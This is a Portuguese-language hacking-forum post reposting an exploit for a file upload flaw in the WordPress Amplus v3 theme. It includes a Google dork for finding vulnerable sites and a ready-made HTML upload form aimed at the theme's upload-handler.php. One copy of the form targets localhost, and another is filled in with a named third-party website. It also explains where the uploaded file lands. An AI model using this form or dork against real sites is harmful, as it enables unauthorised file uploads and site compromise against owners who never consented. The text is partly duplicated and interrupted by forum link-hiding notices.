#############################
# Exploit Title: WordPress Amplus v3.x.x Themes CSRF File Upload Vulnerability
# Author: Bebyyers404
# Date: 11/17/2013
# Infected Version: v3.x.x
# Infected File: upload_handler.php
# Category: webapps/php
# Google dork: inurl:/wp-content/themes/Amplus_v3
##############################
A única coisa que se tem a fazer é substituir o campo do ip localhost no caso o 127.0.0.1 e a versão do tema Amplus por a versão que roda no website.
Vou dar um exemplo:
Website: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
código:
Lembrando que o wordpress tem o diretório /wp-content/upload/, porém você vai ter que procurar o diretório por ano e mês, assim:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Att. Cr4t3r
# Exploit Title: WordPress Amplus v3.x.x Themes CSRF File Upload Vulnerability
# Author: Bebyyers404
# Date: 11/17/2013
# Infected Version: v3.x.x
# Infected File: upload_handler.php
# Category: webapps/php
# Google dork: inurl:/wp-content/themes/Amplus_v3
##############################
Código:
<html><body><form enctype="multipart/form-data" action="http://127.0.0.1/wp-content/themes/Amplus_v3.x.x/library/includes/upload-handler.php" method="post"> <input type="jpg" name="url" value="./" /><br /> Please choose a file: <input name="uploadfile" type="file" /><br /> <input type="submit" value="upload" /></body></html> </form>
Vou dar um exemplo:
Website: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
código:
Código:
<html> <body><form enctype="multipart/form-data" action="http://www.serlibreyfeliz.com/wp-content/themes/amplus_v3.0/library/includes/upload-handler.php" method="post"> <input type="jpg" name="url" value="./" /><br /> Please choose a file: <input name="uploadfile" type="file" /><br /> <input type="submit" value="upload" /> </form> </body> </html>
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Att. Cr4t3r